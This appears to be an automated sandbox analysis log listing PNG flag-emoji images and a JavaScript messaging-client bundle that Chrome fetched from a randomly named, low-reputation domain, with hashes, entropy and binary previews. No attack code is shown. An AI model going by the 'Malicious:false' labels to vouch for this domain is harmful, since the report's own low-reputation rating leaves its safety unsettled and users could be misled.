...................................'tRNS.....$(1;@MV_cbccist~.....................>...cIDATx...Qk.P.....40...,yp.)..VA..|P$...e......"b .J..e..B...;.&7.&.l.......zO.X,...b.X,...b.X......... ...L&^.,..bJJ.bgX6(#.D.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4395
                                  Entropy (8bit):7.927648941001148
                                  Encrypted:false
                                  SSDEEP:96:+bF/m/XIwehRc4dEVDBi+KErcRTtDBNZflVNa+pojwcsgMW:+r3Thqs+k9tDBN3akoDso
                                  MD5:9B9AB4D0F0CCCD697FB998D1D1824249
                                  SHA1:BD3C03EB53E8396792A4AB19328438317C89C20B
                                  SHA-256:32E12F1103311E256569E058A0A9DA1EB9FAC7E93C38E7DA4A3E0942FF63DEEB
                                  SHA-512:2197154F7816A88AB7B7589BAFE8D95BBAD591FD3F71DF963BCB795248D4168C15D705B2C9FF194E85B1B1B64010C2A8099ECB9A10810CFACA230F2F5192D4F9
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f9-1f1ef.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.hh<[..`t4`.4`..^r.m.3_..Nd.j~........~G.'..63_..-I.bv...4g...!. :.ey2^..k..>U5a..`t1]..l.5a..av9e..m.-Y.._t:f .6P....................................................................................................................................................................................x.............`........E..~........../..l...............`..........s..S..r.@q.@q.?p.?o.=m.<....v.l.:.n.g.1v.Si.7j.9...f.5`.'e.4e.8b.0.^._..Y.!.l.b.7[.(\.*.h}[.,X.&\.0.dyW.&.`wZ.0U.#.[tS."X./S."._tO...Tp.PnO...EjU..K...TmL...Hj.YmK..Q.+.Si.>c.He.AbH..P...Ld>...5].E_.7[E...;\..W.*VI.'.(T.)UA...'S.<XF}&.%P.)R.5U.-R."N=~..!L>x...J@r"."J.)L..G..E..E..C8o.<j!..A.+G..A4j...>..A..<6d...<..:..:..80_...<..6..2..4,Z...2..7..0..(../)V...2..,.....+..&..".. .`....'tRNS...."469LV_cccccfls~~~.................@..n....IDATx...oc.}.?.q_...2...5hb.q...m..F.....*../...+....h..f..(.@...A...<..h. E..yT....AR....K.\.`x?......h(.,X.`.....,X.`...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5595
                                  Entropy (8bit):7.857516203339548
                                  Encrypted:false
                                  SSDEEP:96:c2MPoYFTAgFQB/vZOZ3+vQmKREM4KJ4r5vFH64UnzQG5BHIZjk:hMlAsQB/voZ3WQm6oKJO6rnj5Bodk
                                  MD5:FB741EF7B0C9F43B927DA0CCCA211F43
                                  SHA1:9F2B0DE7ED24756E41DA56CAE134EE8879030159
                                  SHA-256:5F1AEE2B5B8552508FFC206FB6D862960F5948FB199D1A42F2308E6CF1543D37
                                  SHA-512:E52DE45EA161E74097A15E1CE8B3E82426E27294102472632D4723ECE6A1779C9A623AD99FA062A624F43BD0698ED6B952B53029054AD4095E2907606E8F1537
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1ed.png
                                  Preview:.PNG........IHDR.....................PLTEGpL..F..G..J..S.![.$`.&g.&i.(i.)k.*l.+l.,m.-p./p.1s.3u.4w.5y.7y.8{.:}.<~.>..?..@..B..C.!D.#F.$H.&I.%H.Wu.oS3VTT.[..n..f..z)....z R.0_.%dj.JV...>.."..Z.}nhnXcv.k}.gx._q.Vm.Hc.?].8V.0Q.)M.)M.(L.(L.(K.(K.(J.%F.#C~"@x <r.8i.3c.,U.(N.$I.#F.!D. C.!D..B..A..C.$G..B./:.px.........ow.ks.]g.Q].KX.AN.7E.. ..'..).....!.&7...LV..-.......qz.z..............q|.zz.o~.W_|o..gw.iy._o.br.ip.fv.6Fg..B..<..?..E."N.'X.+b./k..$..$..)...................._ E..mx...>]n.;HhW=<.4J......v..u..s....7.(3.Z_..................................`l.GV....R`..?O.2C.+<./?.(9.&7.!2............................/@.6F.9I|Eo.M..;.s..x..y........ar.dt.\m.Pe.Ui.J`.AX.1K}3O.+Fy<Qz&K.....y.....{..z...............g..El..y...v..}..y&../..9..,..\iyZ_i9..'-.2Xl.FI.2]."f./s.<z.7v.8t.6o.3h.0^.0\oJ......tRNS.~.............................................................................uR-.@...X.*........................~.V/...gA.........................~.....~~~..................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4765
                                  Entropy (8bit):7.875996011518644
                                  Encrypted:false
                                  SSDEEP:96:fP55dt6Wq/UTWWb0/QXLVRe3yQ+Fy9jLkoZqy5s71A1NHzgL+:nltbjKWYkLVRe3P0yjLkvs4yhzl
                                  MD5:BC4C71C5B3457C2CD465D4C67633A793
                                  SHA1:CD42F9AB302D615EFF343CB845857B02E9372FAB
                                  SHA-256:E007D8363204C5A55653C00EF86C3FD0D29FEB251369906FDCE32A0283C46055
                                  SHA-512:ABA029EFAA790261D0802A04E7E669E46766B565BFE67297184F7819DDD3972A38723359BFE027731B2C855F85516A7818020BCE366097C8026ACBC1BBEE18C8
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1fb.png
                                  Preview:.PNG........IHDR.....................PLTEGpL..Veq...S_k...Rgt...P<K.gs.......~...(p..Q_k...Y...IS}."\fr...Riu.do.R_...R..Ojv.am...Sgt...Ukx.]i...M........................................................................................................................................o...............................!.................................................................s.........z...y}.......!l}..}Cl.jkw.xw.fr.^p.an.jtc[k._k.-..[i....[h.Ue.Vd.Ob.Pa.R`.^dYE\.I[.M[.AV.$ouEV.GU.?S.AR.9O.>^:=M.3J.BSJ6I.0F.+D.3D.+A.&@.&?.%?.%?.%>.$>.(>.#=."<.(<.#;.!;.0=p :.*N$.9. 8..7..7. 6..5..4..4..1..4..2..2..1..1..1../../...../}.-..-..-..,..,..+..*..=..+|.)..(..(..(..'..(q.'x.&..%..%..%p.#..#.."..$e.!.. .. .. |.!\........s.....f...........W..{...........y..f..r..}..\..R.....i..O..[.....K..9..y..[.M{.....tRNS... (4<JUacccbgv}~.....................................................................................................................................................~....IDATx..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4259
                                  Entropy (8bit):7.907995832091385
                                  Encrypted:false
                                  SSDEEP:48:htYjxb6iT11H5qcX1nvj/WipAS4bIuPFBEEXFlG6zlAGsvpEC61UZe2ANumxwNHg:Y1681HAc7pz4EylGiAGsvqC6SDgeFLm
                                  MD5:E12D12C335E6D092D0DD943E2CF1D341
                                  SHA1:778951F9FAD005CED8E2899AF07C12B7B5D0D911
                                  SHA-256:47E91D916196929F3FDE8F93B8AEB928CC376775BAB65A51868D31001347338D
                                  SHA-512:CBD1E81FEE21EFEA2D14A4AD68FD5B350C6CDD197C9C2A6D65C495EE5F08B4B39E36994FC684B7861053242A9A6630F94E42A7CE371F02BC24BBF22C47E30627
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1fb.png
                                  Preview:.PNG........IHDR.....................PLTEGpLy'6.`n.fti.".l{.bpi.#.n|.mzh.".r.i.#.`n..3.p~..Bi.!.esi.#..-x...*<.ft.q.h.!.BS.n|j.$.`n.lzj.%k.$.s.f...lz.esa..o.).m{d...r..Qa.cro.(a...<I.....................t.._...o}P.w.jy.cs.ft.]o.Ym.bq<.g._m.Rh.Tg.Wh.Jb.Yi.Ka.C].Sc,.[.L_.<X.@Y.L^&.W%.V.AW/.V.7S$.U..UA.T..V.3QanS#.T5.S.3P..T.LT./Q".S.3P#.S.)PJxR.%O.ZQ!.R.8Q.@U!.Qy^P.0N .P.0N.DS..O.OM..N..L*.N..N.>R.0L.6O.)K..N.,J.-J..L..K..I..K..K4xK.7L.*HMjJ..J."G..I.*G..H.-H.1Jd[G..H.'E..G..E..E..F./G..B|KD..F.%C..E.(C.~E.~D..C.~C.#A.)C..A.|B..?.!?.{A#q@M[?9e?..>.z?..=..=.)@.y?.!=.%?..<.2@.x>..:..;. =.|;..;UQ;.v<;];.%=..9.!;..:..8..7..7.s9.%<..6..5..6.q7|55..4.r6..4..4..5.$9..2. 7.o5..1.&6..0..3..4..0."1...../../..-.....-..3..-..+..-..3..,..3..+..+.....0..*..)..*{....+..&..&{.+s.*..&..#y.%.."o.%|..i.!w..l..d.._..3R...../tRNS......&+4<=LNVceggtx~~...............................#IDATx...Kn.....o.....!...H^(2,.A.x. Y..9@.u..u.,...A.9@b....m. .....j..Gl.8.~..oP5.^.P.B...7.g......-p...7..n.[....-p..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5495
                                  Entropy (8bit):7.928801327016286
                                  Encrypted:false
                                  SSDEEP:96:FtzaLZ7VrBuAi/tiTVMl6h2YZrycxPNbip72KwmnMIHye0simAlyO2tw9toeF4eG:Ft2LbBa1iTil6h7tNnbQ7MqMIHB1E138
                                  MD5:B68FFC3AF189A90A17FFC0C56FDDBEF4
                                  SHA1:B211A92E76041830FE303079BE5031AD64E9073B
                                  SHA-256:54FE11EC536D8FBEBD0E66CC7C1B82B765093B5CEBE1CAADF9000CC1DC9FB4A1
                                  SHA-512:0DAB5FA3292A42DEBED4A44917E41A4BDA559D6808FBE9EF8A79959AC4C1F2EBF33F8098E481B30C04371C91D94A051A6EC5A9084982957379E461D3A4D1A328
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ea-1f1e8.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.wO..ed..g...m.pg..f....4.m..#..*.6if..p...z..!S.jf...oi...jg..d...oh...oi...t..Ga....b........5..3..0..4.....6....#..7..5..6..5..A..2..K..0../.....-..+..V..6..*.....E.....(..&.....^..%.y..5.."..I.....#..!...'.k...V...&.<...i........T.&...B....d...(...2......S.A...&.......T..1....n.......%..@..,........'t....5..c..!.rW.....Jp.[O...,i..q.[.nEA..}.,.y.]x.fzkuyEC}.`.?rz$.==.59.@F`r<ir!.IW.-:.3D.3COlq.0@.2By`,.Md?h..0A..?JmO.'3aXt[j$.?5.,=.N-X^S.-<=s+.)9.'7.-<8\.T]=jHk. *LR..$4.6F:[tEb0A[Y\Y..#3.(7&Y.../%U..Y.../.$2..,"R..R.u6P...IMJ..).O.%O.:T:.#0.N.M>g..&.L.)Li.L...(..$..%.I.?EF....I...).....!.G.]/N..*.E.....B..B.....C.}.(.@.26f.@.2<B....>... .<..;ux.!p.#.9..7..6k....9|.8..7..6..4.j..y...0..1}o.../{.(..+na...&a.... V...J...!tRNS....,2ADU_ccccg}~~..................*....IDATx...n.U....=...vL.@.".h.pG.Q.R#D.P h..h(R.(.2o@....*.......9...u6^;(...7...G.w.8..8........8..d.....%#p...-..#p.n.....K.s....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4808
                                  Entropy (8bit):7.9343995142958965
                                  Encrypted:false
                                  SSDEEP:96:2/V3QfotGc2noVtO9hs0X+HKHNZK7SVXSowRDpn31vJE+Fh:0AfotFQiOFX+qHmSADR13D
                                  MD5:83C96B32EB1472C164FDA3065DB09692
                                  SHA1:09F1BE24D8ACC2C56A8265EA653E1EE8F5D00F59
                                  SHA-256:6B203D12B0E1C0EB9A10D94D8854AF4C42657D63709F9297032F67FE809B49EF
                                  SHA-512:43C89D2A25EF4DDDCA20FA49D5302C6148D547E12E1CA82FCC951AA9EFCE06E8C0A18FB709CE9717A582C327D0F623CBE0517D3B0625583A8A783F2EBC554A7E
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.8-.9-..#.T9.!..}.m$...!.S9.=#o%.b.zp&.p&.g..o&.n$.kI=c.zi..e.~d.}m-#r'.p'.q&.Y.rn%.b.zk..j..j .j..].ud.|q&.p'.b.zd.}6iS].uf.~[.sAa&T.m%bG.K3...;kW%\E W@{/%2b.3b..WF&.Z..$~X..$.uO.XG.Z5/_..UD.rL.]8.5%..&.. .>-....X3._:.jD..,.yS.gB...1!.a<'.Y.e@.4#.F5...'Z..C2..(..*.7'.SB.\6.c>...wQ.I9...!|U../_.#}V.L;.@0..4.Q@.9).M=.G8....WF....:+.=,.B2.O>.2"..!..3.-....#..0!x* ....1%.>1.UE.A4..-..!.>$.6+.:*.Q@.B2.)..1'h......./o...YG.5*.TD{".9h..[?..$...M=.:....S9p$..9+.....!../..N.(..G9..?....-+\...".%#V.Ip....{...H7.F*.M-..$.$]}...\..F...Tw.(b..S1.q..PA.....H..ep..+r...3.X@.8).T.h..+|c.P2..*..u..{.&.....k..U..pm.4.y/<x4.U8:a..l!G.C...[kc_..3.7.e7..<[.+.Z\....VAw.C.<..8.k".\|....^.)xWJ~h7{_7tZ&mMZ.t,rT3.aS.oF{e.lG=.hc.|D.h qOBxa].xh..R.l.bC%}Y.oJI.nS.t.gE.\9....4tRNS..ttt..+....'..be<...?...Mzl..........H......w.......Au...CIDATx.....P...Yt...x."82.:....F...J.N....'.#...h.}..%.x.c.....?.....3 .....\|...s ..d2.L&..d2.L....)IU.4-..4U-$.%.o.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):6156
                                  Entropy (8bit):7.86034145385729
                                  Encrypted:false
                                  SSDEEP:192:CD2Atq5f5zsK2eF3/XLVjpJJK21xMYxfoT9:CD2WwZNjxMYU
                                  MD5:66995F36D6D8F62692F1B9A46D93C2D6
                                  SHA1:9874A4040BBC4C5FE710434A51744CDBBF849E6D
                                  SHA-256:EB0AFA5CD9BFD452DECF8FC4CE70638E1BB5AA5B2E7CE9A2172283BC74C1F435
                                  SHA-512:82E99E2D051FE599FDD21B05C1B002E34CF7C848E128616AD36C2B1C429844606CD00D9B0DC07B32C647F4B0A2A213DF35C8B204A8797E3FA76E54C8563B795C
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f0-1f1ff.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.dq.dq.gu.u.............V.n..F.&..6..A......;..&..../....R..Kr.^h.bA.w..)..,`.Mmt0?\9^Z..n.....b...h......t..9..5..,..I.y..Wa<..2..=..L..`.._..m..i..Z..g..Y..Y..k..g..i..e..f..j..e..[..Q..I..@..7.....(..+..8..H..8..#..#.. .."..#..#..#..%..$..%.. ............l..I..c..P..E....M....tD....g.....9.....{...W..^..0..8..D..C..2..=..%Z....z...p..-.....&..!..F..6.."..#..8..H..U..\..R..E..7..*................................................................................... ........#.......W..`..]..L..:..%.. .....!.........nz.jv.gr.ep.bl.]h.Xc.T^.OY.X_.\d.Zb.X^.Z_.Za.Yd.Y_.Ze.Yd.^a..q.........~....t..`..;..B..Sz._.)g.l...................s..x.._l.o~.}..y......I^.o..:.....I...........................................................................}..z..z..y.....tRNS.~.........................................v......5U@%....j......................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4147
                                  Entropy (8bit):7.865881719516378
                                  Encrypted:false
                                  SSDEEP:96:XmiU/gAPy3QI3KKQLpIr+qPW5vOzJmLzhI:XmiyZ63QI3Kf3lvOVmLK
                                  MD5:D40A06F2BDBF2CE93833EB72723C110B
                                  SHA1:30159C21D2B6E24784B4414CE7B6425325F97B78
                                  SHA-256:979940B117FA7938EF9CFA2B1563E40F5CEE03F7A42621D4A1744DFEE6C92D0E
                                  SHA-512:819D820490320FDE313EA8CC1889D2A5D6A7A3E567EED143E170C4C66851736B18254E078CEF3B6A9787898D3E6C9214576D98A7D306EB5803B6991AA0A2047E
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1f1.png
                                  Preview:.PNG........IHDR.....................PLTEGpL...a6C...Yo.j.....j..bx.i.....Yp.........~.-&i.....l..v...#a...j..by....<U.i..`v....k .dz.h.....l .bx....l ....c..`../H....................................................................................................................................................................................................................................|...rjx...kd.]S.^V_w..K@.K@.J?.J?.I=.H=.H=.G<.F:.G<.E:.E:.C8.B7Tm..D:.@5.@5.?4.:+.>3.=2.A7.;0.<1.:/Le..8-.3"Dd..<3.7,.5*.6+.;3.4);a..6+.4).. .2'.DQ.3(.5+?\..0&.81.5,./$..#6[..0&.-".&..,!.64.'..*..+ .)..2).)..,#.3,.&.*S..'.0R..%..%..$..) .$..$...'.*"..'.M..".....$. J..+$R5h. .~*)."..G..E..$..D.....C.z'!.A....s&!y#....%:{....?..>.p#..<.p ..;.~...<.y...7.i..q...2v.5..5..3.h...1.0"Na......*..+y.)x.'n.!..!`..|........tRNS......669MS^ccccgiy}~......................................................................................................................................@.....HIDATx...n.E.F.j
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4133
                                  Entropy (8bit):7.913572821395387
                                  Encrypted:false
                                  SSDEEP:96:1eu26bW6vKqVlb7FMYszY6rS5QYK4ycT+L+KMCSlAdkZLA7rqMz:1eu/L/Db7hs+e9+KMCpdWLHMz
                                  MD5:18A317E329781DD1CF420AC61E6013DE
                                  SHA1:EEB4003DE29AB5803BB2903400D2785EB1E637E1
                                  SHA-256:776EC99EF2C9609FC30D867D02DA55EE2C41B11CCD4017DA27EBB028CA1B992D
                                  SHA-512:0CA4442CD32BDE8A2425E6316F74EFE164AFCD159E5CF26E92AD51721BAD1F3ED8570772D16A601DCF97453CD00C8AFEA50942FB162A593A860AFCC427DDB30C
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLeq._.1i."_k.i."gt.g."<K.gs...2?&^.)s%6~i.!`l.i.#w....\i."am.ly.i.#<I.gs.b..]i.j.$jv.h."am.k.%kw.]i.o.(b..^i.0?z....................................w....g......w.g}r..Z..}.s.k.D.njv.eq.[p..u$qqi`m..KQ]j.!.[:.Y\h../O.4RWf..4Q.'P.,E.3Q.2Paq>.2P.1OXc..-J.MSQa.KuN.0N..M.0L..KQ_.t[N.,K.8QK]..+I.%>..I..2.*H.(G.-Ieb)LZ..'FCW..&D.;F.+EEV..$BUVk.%B."A..7&rG.)CCR.. ><Q..$A..>..<..<^>.?N..&A..:. <<\D.([7L...9..83J..!;8J...7.%=..6..-m;H..)..5v-s1F.8I~EP5..5..33F...7,D.. 6..2..1."7..0..3WA*&@.&@....&?.%?.)?...-%?...3*?.J1.,@.$>...,9?g..,"<...+..0.?...1.:. :..9.&:...).8.|.-.6..6...&..)|.K..+..'.9..4.6<(.3..3.s.*y.)$3w.2..1.V.b.0...#.3..."...{.$o.%.-..,..,..,.0 y.*..*..*..+}z...(.s..h.!.(..'..&..&..'q.%..$.i...#.."..!...z.!.a...........(.O..............|(....s..i..\.../...&tRNS...!(6<LUabccggwx~~...........................IDATx...Mn.@....3...."@....s.d..8.K..%.@,.U !.TQe;.].?4.ZV4.T..l.,yvO..Lp.\....r.\....r....y.....6..=......'.L.R......~v]...._&.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5305
                                  Entropy (8bit):7.82632516605208
                                  Encrypted:false
                                  SSDEEP:96:l4sE0jGj2A5chlLNVxoepC93pPOSVzrGMo7b8UokGLwC8aWZwZSqi:ly9SA5chliepC9335GMo7QUoQI1I
                                  MD5:27E624FF8A75E3933799D8FA7E32B67C
                                  SHA1:CFFF8352B7DA6003AA599CC3A01A71363B7BF02C
                                  SHA-256:AF5D745A960EF2E0B99329A50B563FAB42B30317B1BFB5EC71CE0F0FF26190FA
                                  SHA-512:CC7CC4C6F1071B92DA18BB45A5AD723756EA5C150A5AAB55CD5CCA27DA53997AC26504DBB0D43CFC788B19DDB0C65021DA4D53BE4C841C2DD8246A3F3ED0A90C
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1fe.png
                                  Preview:.PNG........IHDR.....................PLTEGpL%zI#zF$}H&.N(.U(.X&.X(.Z4.a2.d6.h3.b-.Y4._B.fT.p].wd.~h..l..q..e.._..U.}K.wB.rC.pQ.xX.zC.m..;v..p..q..t..t..u..y..m..f.}...j..l..W...................d..0..}...............Y..n..5..J..I..G..F..E..B..A..?..>..<..:..8..3.1.....'...L.lX.wJ.oM.m5.kE.wX..k.y...".Y..T..N..E...................kol.W3.\5T.ll..p...Z3.^6.aB.[3.Z3.V/.Z4.U/.[3.R/.S,.O&.U,.[2.`4.r:.}?..C..H..G..I..I..K..L..M..N..Q..S!.U#.X&.[*.^+.`/.c1.e4.h7.j6.k8.l9.m:.m:.n:.o,.d!.\.............................................d....w....(..X...................................I..F..J..3..M..E..1..<.y%C.b.o' .P..Q'.Q".I.o?.c:.h=!uD.g5g....3.4:.#&'...$)V`Zrb).8KA.YN+.03.>D.37<.................:1....&$#......m*,.=A.HN.DI.AE.>C.:?.7<.5:.38.27.16./4.-2.+0.*/.(-.',.&+.%).!&. $..!..........|y.....tRNS.c...............................h7...[a..~~z..........................................................&GT|...gA+...............................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3139
                                  Entropy (8bit):7.854025566514434
                                  Encrypted:false
                                  SSDEEP:48:hEu7G3PL/hchUhhXz5ZgAaMvjt4W/nVgoUOSM8uUlVX1ezYp1N56xyN:9GD/+hghXoPU4+UOZJUx08pO+
                                  MD5:95EA82BC7753BBB3CEC2A90558797E60
                                  SHA1:061564F6E98C209744078F4AEFF4919CB4032B0C
                                  SHA-256:C57906595C97FF0773DF3A3B6BF5689E8D1D05C26481FDD62D0633F15BE71DEE
                                  SHA-512:646643F0C096106FF4D0ECA53AA9B45F1703DCFD70CC2A66D7C4DE34C66B3A6465BB1452B2C898CC6BB0F56DFA2AA1CA5BE6B20596E98E4F3D086FC06DD6292C
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1ea.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.aA..Y5....k\f...lGO...fnokO..e...z*...y...ah[[[..(......kq.x*.RZ```z......gn.....,,,.ho.....w...z+ccc....dkRRRx....eee....z+.......ddd.......gn.z*ccc.....w...nu.{+///.....`ab....ah...x...z*..R..N..T..M..S..T..Q..P..S..S..R..S..Q..S..P..R..O..R..R..N..W..P..R..P..M..[..N..L..O.._..L..K..M..N..K..c..P..g..L..i..G..m..G..G..p..W..r..G....y..D..w.B.?..<..9..5.ns..2.XS.\a.dk../.^f.F@..-.E?.OZ.Za.T\.{+.DP.KU.7E.DM.+;.>I./?.7B.DL.*9hhe.'7.(8.94.%5.%4.4?.#2.&4..:./<.*8."1```..9.8B.... ...,[[[..-. -.35..,..+.$1. ...*..-..8..*..(..-..)..'VVV. .. ...&..&..$..'..$.."..#QQP..!..".(-..+.. ..'..!..................JJJ.....'........).."...CCC..#......==<..!......665......|..//00/ 0. 0../-.v..())*(.............................................................$.......tRNS.......&077:BILPUZcddimosyx}~.........................................................................................................................Xz.1...\IDATx...=..D....U.]n.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:Unicode text, UTF-8 text, with very long lines (65500), with no line terminators
                                  Category:downloaded
                                  Size (bytes):600806
                                  Entropy (8bit):5.368119835607673
                                  Encrypted:false
                                  SSDEEP:6144:VkBAibwsEfwd3q+IDUNxmt4B+vb4CXOBCJ5EwjNoznYuNsKZam3Vt:V3i5QGmt4B+vb4C1Bg7s5m3Vt
                                  MD5:038CB1A82CC7845451DCE0EDAF01D2F1
                                  SHA1:63FC6F036A969D4235D7C82057294F8C039401A4
                                  SHA-256:935B399CCC0970176DA62E39FA0B4AACCAA708103103724E23D6BE95F87C97A9
                                  SHA-512:BC3DAA14794848BE0065D7B7A83EEE201ECF812298FB6B58FA4D02666837223A992098458B68E19D9B9631818C5438ED350A01FF6A8ADB9E45B2E667CD93BEB3
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/3559.80b270ba0e217557b392.js
                                  Preview:(()=>{var e,t,s={6453:(e,t,s)=>{"use strict";s.d(t,{A:()=>n});class n{constructor(e){this.isUpload=e}}},3559:(e,t,s)=>{"use strict";var n={};s.r(n),s.d(n,{Type:()=>_o,clear:()=>So,fetch:()=>bo,isCacheApiSupported:()=>yo,remove:()=>vo,save:()=>wo});var a={};s.r(a),s.d(a,{abortChatRequests:()=>Pd,abortRequestGroup:()=>Cd,acceptBotUrlAuth:()=>Xl,acceptCall:()=>Ap,acceptLinkUrlAuth:()=>Zl,acceptPhoneCall:()=>ff,activateStealthMode:()=>Uf,addChatMembers:()=>wr,allowBotSendMessages:()=>tp,answerCallbackButton:()=>Dl,applyBoost:()=>Lf,applyGiftCode:()=>$f,blockUser:()=>qu,broadcastLocalDbUpdateFull:()=>De,changeSessionSettings:()=>xd,changeSessionTtl:()=>Vd,changeStarsSubscription:()=>rg,checkChatInvite:()=>br,checkChatUsername:()=>fu,checkChatlistInvite:()=>Vr,checkGiftCode:()=>Kf,checkPassword:()=>Cl,checkUsername:()=>Eu,clearPassword:()=>Ml,clearRecentReactions:()=>Fp,clearRecentStickers:()=>Kd,clickSponsoredMessage:()=>Fc,closePoll:()=>Pc,confirmCall:()=>Pp,confirmPhoneCall:()=>pf,convert
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):6098
                                  Entropy (8bit):7.931522346282861
                                  Encrypted:false
                                  SSDEEP:96:twfuEWMmGFR8c3n8pcYOOXW4nKiqZ2LZiVLPgD/ocr5xnecuIteiq3DnyUjn/VfN:nEnbacWm4KihIVLPgFr5xBpeiq3jy2nL
                                  MD5:42BB71DFB2EA887CE5006FBFB23555AF
                                  SHA1:6CC61D09EA495A5BDCB3A8041E53D79EE2D8503B
                                  SHA-256:CD3AE3B52D6C0101AF30E3705DF0A9893FD8CFB38BD2FA384E058B2C94FC4EF1
                                  SHA-512:449C1FDDAF5B36F3E4812F6B406CB6E88EABEDBBBA8596AD77391FA48B27BF91CC5C15FE01FB62253E25FBD1DD18574AC1E0A65BBE15D13D69A33810D4CC1F5A
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.jxm.|q...gyn..pxm...eyn......#...yn..nyn............+.n~s.rh..m.u.rh...sxm...j.u.qg...s.t.qf...d..2.....................................................8...............6.....w........3...........7..c..)...........8....7.....7..%..@..3..4..7....6..3..G..3..... ..1..O../..9..-.....Q..,..[..-.....<..(.......'..2..'..^..J..%.....2..#.. ..b.. ..2..p.....K..$.......j..3.....%.8....W.......%.3....h.E........a...G.%....3...'.:..L....@..Y.......Z..&....;.....&..@....>..'.......y?........%..r.......l@..#.......{..g?....\B.....$.|y..(....RA.in.~..~..DC.g3.z..v..5Iqmf.-F.<B.N>|q..V].4F.V6.3Exl..+Csh..1A.@D.(C_f*nc..FA..>.0=XWOpKF.#:..9.;:./:.#5RM).-7..+q73.%1..'s'0?<,`(...(r.)O")41.9$'%%$c...%# ...." .................................5......$tRNS... "18CTTcccgi{~~~..................g.....]IDATx...{..W}...3g..}.....6q.c..B.@.-.H..(PH!........?..V.E....P.-!*..C.. .6Q..b......c'~.....}.9...9wv...v.@.......~..\.g...<
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3846
                                  Entropy (8bit):7.914429305632146
                                  Encrypted:false
                                  SSDEEP:96:MODbfCWrsPkZd0vweydplkr0f25CS99VOPHci7Czy:MOCEcwJlkwfyjVacZzy
                                  MD5:D5C9793BF7D16D9FAF75C47DA592B057
                                  SHA1:DCD1686F15B3EAADB4CA12B63A03B58CDE28AC2F
                                  SHA-256:121C033748179D8819919E14DAEAE8BD1A0536A9A3B27661556F928B08FFC14A
                                  SHA-512:635D8FD815701BB40E27F2528EBC464B0BF65372DCD101F38C50956AFCD20A2A4797788A2390E34253D9428445F1ADC09C9C3A52D2A266CD1578CA6561CC1477
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ee-1f1e9.png
